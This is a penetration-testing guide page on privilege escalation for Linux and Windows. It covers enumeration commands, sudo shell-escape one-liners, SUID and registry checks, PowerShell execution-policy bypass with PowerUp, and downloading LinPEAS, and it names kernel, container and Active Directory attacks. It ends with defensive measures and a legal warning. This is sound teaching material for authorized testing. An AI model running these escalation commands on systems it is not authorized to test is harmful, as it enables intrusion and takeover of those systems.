β¬οΈ Privilege Escalation β
Comprehensive guide to privilege escalation techniques for Linux and Windows systems
π― What is Privilege Escalation? β
β‘ Escalation Overview
The process of gaining higher-level permissions on a system than initially obtained through exploitation
Horizontal
Same privilege level, different user
Vertical
Higher privilege level
Local
Single system escalation
Domain
Network-wide escalation
π§ Linux Privilege Escalation β
π Linux Enumeration & Exploitation
Systematic approach to discovering and exploiting Linux privilege escalation vectors
System Enumeration
Information gathering
# Basic enumeration
whoami && id
uname -a
cat /etc/os-release
ps aux | grep root
ss -tulpn
SUDO Exploitation
Privilege escalation via sudo
# Check sudo permissions
sudo -l
# Common sudo bypasses
sudo vim -c ':!/bin/bash'
sudo find / -exec /bin/bash \;
File Permissions
SUID/SGID exploitation
# Find SUID/SGID binaries
find / -perm -4000 2>/dev/null
find / -perm -2000 2>/dev/null
# Writable files and directories
find / -writable 2>/dev/null
Cron Jobs
Scheduled task exploitation
# Check cron jobs
cat /etc/crontab
ls -la /etc/cron*
crontab -l
# Monitor process execution
pspy64
πͺ Windows Privilege Escalation β
πͺ Windows Exploitation Techniques
Windows-specific privilege escalation methods and automated enumeration tools
System Information
Windows enumeration
# Basic enumeration
whoami /all
systeminfo
net user
net localgroup administrators
tasklist /svc
Service Exploitation
Unquoted service paths
# Check service permissions
sc query
wmic service get name,pathname,state
# PowerShell service enumeration
Get-WmiObject win32_service
Token Impersonation
Access token manipulation
# Check privileges
whoami /priv
# Common privilege escalation
SeImpersonatePrivilege
SeAssignPrimaryTokenPrivilege
Registry Analysis
Configuration exploitation
# Registry enumeration
reg query HKLM\Software\Policies
reg query HKCU\Software\Policies
# AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
π€ Automated Enumeration Tools β
βοΈ Enumeration Scripts
Automated tools to quickly identify privilege escalation vectors on target systems
π§ Linux Enumeration
# LinPEAS - Comprehensive enumeration
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
./linpeas.sh
# LinEnum - Alternative script
./LinEnum.sh -t
πͺ Windows Enumeration
# WinPEAS - Windows enumeration
winpeas.exe
# PowerUp - PowerShell script
powershell -ep bypass
. .\PowerUp.ps1; Invoke-AllChecks
π Process Monitoring
# pspy - Monitor processes (Linux)
./pspy64
# procmon - Process Monitor (Windows)
procmon.exe
# PowerShell process monitoring
Get-WmiObject Win32_Process
π‘οΈ Advanced Techniques β
π Advanced Exploitation
Sophisticated techniques for experienced penetration testers and red team operators
π§ Kernel Exploitation
- CVE Research: Public vulnerability databases
- Dirty COW: CVE-2016-5195 race condition
- Local Exploits: Kernel module exploitation
- Memory Corruption: Buffer overflow techniques
π Container Escapes
- Docker Breakouts: Privileged containers
- Kubernetes Escapes: Pod security contexts
- Namespace Isolation: Breaking container boundaries
- Runtime Exploitation: Container runtime vulnerabilities
π Domain Escalation
- Kerberoasting: Service account attacks
- ASREPRoasting: Pre-authentication disabled
- DCSync: Domain controller replication
- Golden Tickets: Persistence techniques
π Prevention & Defense β
π‘οΈ Defensive Measures
Best practices to prevent privilege escalation attacks and maintain system security
π System Hardening
- Principle of Least Privilege: Minimal necessary permissions
- Regular Updates: Patch management strategy
- Service Removal: Disable unnecessary services
- Secure Configuration: Follow security baselines
π Monitoring & Detection
- Process Monitoring: Unusual process execution
- File Integrity: Monitor critical system files
- Privilege Changes: User permission modifications
- Log Analysis: Security event correlation
ποΈ Architecture Security
- Segmentation: Network and system isolation
- Access Controls: Multi-factor authentication
- Containers: Proper isolation and security contexts
- Endpoint Protection: EDR and behavioral analysis
π‘ Penetration Testing Tips
- Always document findings: Keep detailed notes of successful escalation paths
- Test multiple vectors: Don't stop at the first working method
- Understand the impact: Know what level of access you've gained
- Clean up afterwards: Remove any artifacts or modifications made during testing
β οΈ Legal and Ethical Considerations
Privilege escalation techniques should only be used during authorized penetration testing engagements or on systems you own. Unauthorized privilege escalation is illegal and can result in criminal charges.
π¨ Red Team Warning
When conducting red team operations, be extremely careful with privilege escalation techniques that could cause system instability or data loss. Always have a rollback plan and coordinate with the blue team.
πΊ Video Tutorial β
π₯ Privilege Escalation Walkthrough
Watch this comprehensive video tutorial covering privilege escalation techniques and methodologies
π― Master Privilege Escalation
Practice these techniques in authorized environments and always follow responsible disclosure practices